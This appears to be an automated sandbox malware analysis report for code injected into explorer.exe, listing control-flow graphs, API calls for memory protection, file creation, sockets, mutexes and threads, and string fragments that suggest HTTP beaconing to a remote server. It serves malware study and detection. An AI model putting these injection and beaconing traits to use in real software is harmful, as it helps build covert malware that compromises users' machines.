                                                                                                                                                                                                        execution_graph 20211 1396c8c2 20212 1396c934 20211->20212 20213 1396c9a6 20212->20213 20214 1396c995 ObtainUserAgentString 20212->20214 20214->20213 20215 13972e12 20219 13971942 20215->20219 20217 13972e45 NtProtectVirtualMemory 20218 13972e70 20217->20218 20220 13971967 20219->20220 20220->20217 20221 13971232 20222 1397125c 20221->20222 20224 13971334 20221->20224 20223 13971410 NtCreateFile 20222->20223 20222->20224 20223->20224 20225 13971f82 20227 13971fb8 20225->20227 20226 13972022 20227->20226 20230 13972081 20227->20230 20237 1396e5b2 20227->20237 20229 13972134 20229->20226 20236 139721b2 20229->20236 20240 1396e732 20229->20240 20230->20226 20230->20229 20232 13972117 getaddrinfo 20230->20232 20232->20229 20234 139727f4 setsockopt recv 20234->20226 20235 13972729 20235->20226 20235->20234 20236->20226 20243 1396e6b2 20236->20243 20238 1396e5ec 20237->20238 20239 1396e60a socket 20237->20239 20238->20239 20239->20230 20241 1396e76a 20240->20241 20242 1396e788 connect 20240->20242 20241->20242 20242->20236 20244 1396e6e7 20243->20244 20245 1396e705 send 20243->20245 20244->20245 20245->20235 20246 139662dd 20250 1396631a 20246->20250 20247 139663fa 20248 13966328 SleepEx 20248->20248 20248->20250 20250->20247 20250->20248 20253 13970f12 7 API calls 20250->20253 20254 13967432 NtCreateFile 20250->20254 20255 139660f2 6 API calls 20250->20255 20253->20250 20254->20250 20255->20250 20256 13972bac 20257 13972bb1 20256->20257 20290 13972bb6 20257->20290 20291 13968b72 20257->20291 20259 13972c2c 20260 13972c85 20259->20260 20262 13972c54 20259->20262 20263 13972c69 20259->20263 20259->20290 20305 13970ab2 NtProtectVirtualMemory 20260->20305 20301 13970ab2 NtProtectVirtualMemory 20262->20301 20266 13972c80 20263->20266 20267 13972c6e 20263->20267 20264 13972c8d 20306 1396a102 ObtainUserAgentString NtProtectVirtualMemory 20264->20306 20266->20260 20268 13972c97 20266->20268 20303 13970ab2 NtProtectVirtualMemory 20267->20303 20272 13972cbe 20268->20272 20273 13972c9c 20268->20273 20270 13972c5c 20302 13969ee2 ObtainUserAgentString NtProtectVirtualMemory 20270->20302 20277 13972cc7 20272->20277 20278 13972cd9 20272->20278 20272->20290 20295 13970ab2 NtProtectVirtualMemory 20273->20295 20275 13972c76 20304 13969fc2 ObtainUserAgentString NtProtectVirtualMemory 20275->20304 20307 13970ab2 NtProtectVirtualMemory 20277->20307 20278->20290 20309 13970ab2 NtProtectVirtualMemory 20278->20309 20281 13972ccf 20308 1396a2f2 ObtainUserAgentString NtProtectVirtualMemory 20281->20308 20283 13972cac 20296 13969de2 ObtainUserAgentString 20283->20296 20285 13972ce5 20310 1396a712 ObtainUserAgentString NtProtectVirtualMemory 20285->20310 20288 13972cb4 20297 13966412 20288->20297 20293 13968b93 20291->20293 20292 13968cce 20292->20259 20293->20292 20294 13968cb5 CreateMutexW 20293->20294 20294->20292 20295->20283 20296->20288 20299 13966440 20297->20299 20298 13966473 20298->20290 20299->20298 20300 1396644d CreateThread 20299->20300 20300->20290 20301->20270 20302->20290 20303->20275 20304->20290 20305->20264 20306->20290 20307->20281 20308->20290 20309->20285 20310->20290

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 13971F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 0 13971f82-13971fb6 1 13971fd6-13971fd9 0->1 2 13971fb8-13971fbc 0->2 4 13971fdf-13971fed 1->4 5 139728fe-1397290c 1->5 2->1 3 13971fbe-13971fc2 2->3 3->1 6 13971fc4-13971fc8 3->6 7 139728f6-139728f7 4->7 8 13971ff3-13971ff7 4->8 6->1 9 13971fca-13971fce 6->9 7->5 10 13971fff-13972000 8->10 11 13971ff9-13971ffd 8->11 9->1 12 13971fd0-13971fd4 9->12 13 1397200a-13972010 10->13 11->10 11->13 12->1 12->4 14 13972012-13972020 13->14 15 1397203a-13972060 13->15 14->15 16 13972022-13972026 14->16 17 13972062-13972066 15->17 18 13972068-1397207c call 1396e5b2 15->18 16->7 20 1397202c-13972035 16->20 17->18 21 139720a8-139720ab 17->21 22 13972081-139720a2 18->22 20->7 23 13972144-13972150 21->23 24 139720b1-139720b8 21->24 22->21 25 139728ee-139728ef 22->25 23->25 28 13972156-13972165 23->28 26 139720e2-139720f5 24->26 27 139720ba-139720dc call 13971942 24->27 25->7 26->25 30 139720fb-13972101 26->30 27->26 31 13972167-13972178 call 1396e552 28->31 32 1397217f-1397218f 28->32 30->25 37 13972107-13972109 30->37 31->32 34 139721e5-1397221b 32->34 35 13972191-139721ad call 1396e732 32->35 40 1397222d-13972231 34->40 41 1397221d-1397222b 34->41 43 139721b2-139721da 35->43 37->25 42 1397210f-13972111 37->42 45 13972247-1397224b 40->45 46 13972233-13972245 40->46 44 1397227f-13972280 41->44 42->25 47 13972117-13972132 getaddrinfo 42->47 43->34 49 139721dc-139721e1 43->49 48 13972283-139722e0 call 13972d62 call 1396f482 call 1396ee72 call 13973002 44->48 50 13972261-13972265 45->50 51 1397224d-1397225f 45->51 46->44 47->23 52 13972134-1397213c 47->52 63 139722f4-13972354 call 13972d92 48->63 64 139722e2-139722e6 48->64 49->34 54 13972267-1397226b 50->54 55 1397226d-13972279 50->55 51->44 52->23 54->48 54->55 55->44 69 1397248c-139724b8 call 13972d62 call 13973262 63->69 70 1397235a-13972396 call 13972d62 call 13973262 call 13973002 63->70 64->63 65 139722e8-139722ef call 1396f042 64->65 65->63 79 139724ba-139724d5 69->79 80 139724d9-13972590 call 13973262 * 3 call 13973002 * 2 call 1396f482 69->80 85 139723bb-139723e9 call 13973262 * 2 70->85 86 13972398-139723b7 call 13973262 call 13973002 70->86 79->80 110 13972595-139725b9 call 13973262 80->110 100 13972415-1397241d 85->100 101 139723eb-13972410 call 13973002 call 13973262 85->101 86->85 104 13972442-13972448 100->104 105 1397241f-13972425 100->105 101->100 104->110 111 1397244e-13972456 104->111 108 13972467-13972487 call 13973262 105->108 109 13972427-1397243d 105->109 108->110 109->110 121 139725d1-139726ad call 13973262 * 7 call 13973002 call 13972d62 call 13973002 call 1396ee72 call 1396f042 110->121 122 139725bb-139725cc call 13973262 call 13973002 110->122 111->110 116 1397245c-1397245d 111->116 116->108 133 139726af-139726b3 121->133 122->133 135 139726b5-139726fa call 1396e382 call 1396e7b2 133->135 136 139726ff-1397272d call 1396e6b2 133->136 158 139728e6-139728e7 135->158 145 1397272f-13972735 136->145 146 1397275d-13972761 136->146 145->146 151 13972737-1397274c 145->151 147 13972767-1397276b 146->147 148 1397290d-13972913 146->148 155 13972771-13972773 147->155 156 139728aa-139728df call 1396e7b2 147->156 153 13972779-13972784 148->153 154 13972919-13972920 148->154 151->146 152 1397274e-13972754 151->152 152->146 159 13972756 152->159 160 13972786-13972793 153->160 161 13972795-13972796 153->161 154->160 155->153 155->156 156->158 158->25 159->146 160->161 164 1397279c-139727a0 160->164 161->164 167 139727a2-139727af 164->167 168 139727b1-139727b2 164->168 167->168 170 139727b8-139727c4 167->170 168->170 173 139727c6-139727ef call 13972d92 call 13972d62 170->173 174 139727f4-13972861 setsockopt recv 170->174 173->174 175 139728a3-139728a4 174->175 176 13972863 174->176 175->156 176->175 179 13972865-1397286a 176->179 179->175 183 1397286c-13972872 179->183 183->175 186 13972874-139728a1 183->186 186->175 186->176
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                                                        • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                                        • API String ID: 1564272048-1117930895
                                                                                                                                                                                                        • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                        • Instruction ID: 29ddad213ecb6f3c517077fa864f551dcec769737ee2134a04db7cda2fd40dfa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86527E34628B488BC719EF68C4947EAB7E5FB54300F54466EC4AFC7186EE30B54ACB81
                                                                                                                                                                                                        Function 13971232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 299 13971232-13971256 300 139718bd-139718cd 299->300 301 1397125c-13971260 299->301 301->300 302 13971266-139712a0 301->302 303 139712a2-139712a6 302->303 304 139712bf 302->304 303->304 305 139712a8-139712ac 303->305 306 139712c6 304->306 307 139712b4-139712b8 305->307 308 139712ae-139712b2 305->308 309 139712cb-139712cf 306->309 307->309 310 139712ba-139712bd 307->310 308->306 311 139712d1-139712f7 call 13971942 309->311 312 139712f9-1397130b 309->312 310->309 311->312 317 13971378 311->317 316 1397130d-13971332 312->316 312->317 318 13971334-1397133b 316->318 319 139713a1-139713a8 316->319 320 1397137a-139713a0 317->320 321 13971366-13971370 318->321 322 1397133d-13971360 call 13971942 318->322 323 139713d5-139713dc 319->323 324 139713aa-139713d3 call 13971942 319->324 321->317 328 13971372-13971373 321->328 322->321 325 13971410-13971458 NtCreateFile call 13971172 323->325 326 139713de-1397140a call 13971942 323->326 324->317 324->323 335 1397145d-1397145f 325->335 326->317 326->325 328->317 335->317 336 13971465-1397146d 335->336 336->317 337 13971473-13971476 336->337 338 13971486-1397148d 337->338 339 13971478-13971481 337->339 340 139714c2-139714ec 338->340 341 1397148f-139714b8 call 13971942 338->341 339->320 347 139714f2-139714f5 340->347 348 139718ae-139718b8 340->348 341->317 346 139714be-139714bf 341->346 346->340 349 13971604-13971611 347->349 350 139714fb-139714fe 347->350 348->317 349->320 351 13971500-13971507 350->351 352 1397155e-13971561 350->352 355 13971509-13971532 call 13971942 351->355 356 13971538-13971559 351->356 357 13971567-13971572 352->357 358 13971616-13971619 352->358 355->317 355->356 362 139715e9-139715fa 356->362 363 13971574-1397159d call 13971942 357->363 364 139715a3-139715a6 357->364 360 1397161f-13971626 358->360 361 139716b8-139716bb 358->361 369 13971657-1397166b call 13972e92 360->369 370 13971628-13971651 call 13971942 360->370 366 139716bd-139716c4 361->366 367 13971739-1397173c 361->367 362->349 363->317 363->364 364->317 365 139715ac-139715b6 364->365 365->317 372 139715bc-139715e6 365->372 373 139716c6-139716ef call 13971942 366->373 374 139716f5-13971734 366->374 376 139717c4-139717c7 367->376 377 13971742-13971749 367->377 369->317 387 13971671-139716b3 369->387 370->317 370->369 372->362 373->348 373->374 397 13971894-139718a9 374->397 376->317 380 139717cd-139717d4 376->380 383 1397174b-13971774 call 13971942 377->383 384 1397177a-139717bf 377->384 388 139717d6-139717f6 call 13971942 380->388 389 139717fc-13971803 380->389 383->348 383->384 384->397 387->320 388->389 395 13971805-13971825 call 13971942 389->395 396 1397182b-13971835 389->396 395->396 396->348 401 13971837-1397183e 396->401 397->320 401->348 402 13971840-13971886 401->402 402->397
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID: `
                                                                                                                                                                                                        • API String ID: 823142352-2679148245
                                                                                                                                                                                                        • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                        • Instruction ID: 65057cfb723636d168dc97fa414352e9752544d51029639450fc70571e151a3d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53223AB0A18B099FCB59DF28C4957AAF7E6FB98301F44422EE45ED3690DB30E451CB85
                                                                                                                                                                                                        Function 13972E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 443 13972e12-13972e6e call 13971942 NtProtectVirtualMemory 446 13972e70-13972e7c 443->446 447 13972e7d-13972e8f 443->447
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 13972E67
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                                                                                        • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                        • Instruction ID: b72e4a88ce811c8da94be94b74a730746f429590658197cb15a79cca51ff0015
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6301B134628B884F8788EF6CE48412AB7E4FBCD314F000B3EE99AC3250EB70C5414B42
                                                                                                                                                                                                        Function 13972E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 448 13972e0a-13972e38 449 13972e45-13972e6e NtProtectVirtualMemory 448->449 450 13972e40 call 13971942 448->450 451 13972e70-13972e7c 449->451 452 13972e7d-13972e8f 449->452 450->449
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtProtectVirtualMemory.NTDLL ref: 13972E67
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MemoryProtectVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2706961497-0
                                                                                                                                                                                                        • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                                        • Instruction ID: 07ba1ee58d154e07c64ecb4497760fd31c104014912f59938f3da317e864f50c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8901A234628B884B8748EB2C94452A6B3E5FBCE314F000B7EE9DAC3240DB21D5024B82
                                                                                                                                                                                                        Function 1396C8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ObtainUserAgentString.URLMON ref: 1396C9A0
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AgentObtainStringUser
                                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                        • API String ID: 2681117516-319646191
                                                                                                                                                                                                        • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                        • Instruction ID: 3f758d35019bc0bf43445f28661e1adf3b1903a85c77f7a964a470a5565b0f54
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F531D171614B4C8BCB05EFA8C8857EEBBE5FB58204F40022ED44ED7240DE749645CB89
                                                                                                                                                                                                        Function 1396C8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ObtainUserAgentString.URLMON ref: 1396C9A0
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AgentObtainStringUser
                                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                        • API String ID: 2681117516-319646191
                                                                                                                                                                                                        • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                        • Instruction ID: 14173c4929a7bd1b6e1cfc49e55bbd040f20994efe6b03919982acafd861f3f0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9721C171A10B4C8BCB05EFA8C8857EEBBA5FF58244F40422EE45AD7280DE7496058B89
                                                                                                                                                                                                        Function 13968B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                                                        • String ID: .dll$el32$kern
                                                                                                                                                                                                        • API String ID: 1964310414-1222553051
                                                                                                                                                                                                        • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                                        • Instruction ID: 1bcd038bdbfd1bf95698267686e244200782a5e1bb0dfa6a9f8d70017c448feb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 354149B4918A0C8FDB84EFA8C8D9BAD7BE4FB58300F44417EC84ADB255DE349945CB85
                                                                                                                                                                                                        Function 13968B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                                                        • String ID: .dll$el32$kern
                                                                                                                                                                                                        • API String ID: 1964310414-1222553051
                                                                                                                                                                                                        • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                                        • Instruction ID: b8f20fae538504ac04e1cf3fb4fb00872b291fad7db502fa4b76420d2d307933
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B4138B4918A0C8FDB84EFA8C4D9BAD77E1FB68300F44417EC84ADB255DE349945CB85
                                                                                                                                                                                                        Function 1396E72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 289 1396e72e-1396e768 290 1396e76a-1396e782 call 13971942 289->290 291 1396e788-1396e7ab connect 289->291 290->291
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: connect
                                                                                                                                                                                                        • String ID: conn$ect
                                                                                                                                                                                                        • API String ID: 1959786783-716201944
                                                                                                                                                                                                        • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                                        • Instruction ID: 6d610fba57c376a05d3e90bc21f10bc8b678317dac7c94669581f1f33c2ed7b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A010C74618B188FCB84EF5CE088B55B7E0EB59314F1545AED90DCB266C674D9818BC2
                                                                                                                                                                                                        Function 1396E732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 294 1396e732-1396e768 295 1396e76a-1396e782 call 13971942 294->295 296 1396e788-1396e7ab connect 294->296 295->296
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: connect
                                                                                                                                                                                                        • String ID: conn$ect
                                                                                                                                                                                                        • API String ID: 1959786783-716201944
                                                                                                                                                                                                        • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                                        • Instruction ID: 0264f9506c798fd22af57ef882a0365929ad00a326a0966fbba8986ee3046553
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA012C70618A1C8FCB84EF5CE088B55B7E0FB59314F1541BEE80DCB266CA74C9818BC2
                                                                                                                                                                                                        Function 1396E6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 407 1396e6b2-1396e6e5 408 1396e6e7-1396e6ff call 13971942 407->408 409 1396e705-1396e72d send 407->409 408->409
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: send
                                                                                                                                                                                                        • String ID: send
                                                                                                                                                                                                        • API String ID: 2809346765-2809346765
                                                                                                                                                                                                        • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                                        • Instruction ID: e9a9d2750bea23ebfae2b76bba147513b5bde18a4550433118999a90de1bceb6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA011270518A188FDB84DF1CE048B1577E0EB58314F1545AED85DCB266C670D8818B85
                                                                                                                                                                                                        Function 1396E5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 412 1396e5b2-1396e5ea 413 1396e5ec-1396e604 call 13971942 412->413 414 1396e60a-1396e62b socket 412->414 413->414
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: socket
                                                                                                                                                                                                        • String ID: sock
                                                                                                                                                                                                        • API String ID: 98920635-2415254727
                                                                                                                                                                                                        • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                                        • Instruction ID: 484db8edaf2d4b76cb7101eb2478a59056fba8a17691b9008305283d64094548
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC012C70618A188FCB84EF1CE048B55BBE4FB59354F1545AEE85ECB266C7B0C9818B86
                                                                                                                                                                                                        Function 139662DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 417 139662dd-13966320 call 13971942 420 13966326 417->420 421 139663fa-1396640e 417->421 422 13966328-13966339 SleepEx 420->422 422->422 423 1396633b-13966341 422->423 424 13966343-13966349 423->424 425 1396634b-13966352 423->425 424->425 426 1396635c-1396636a call 13970f12 424->426 427 13966354-1396635a 425->427 428 13966370-13966376 425->428 426->428 427->426 427->428 430 139663b7-139663bd 428->430 431 13966378-1396637e 428->431 434 139663d4-139663db 430->434 435 139663bf-139663cf call 13966e72 430->435 431->430 433 13966380-1396638a 431->433 433->430 437 1396638c-139663b1 call 13967432 433->437 434->422 436 139663e1-139663f5 call 139660f2 434->436 435->434 436->422 437->430
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35236192272.00000000138D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 138D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_138d0000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3472027048-0
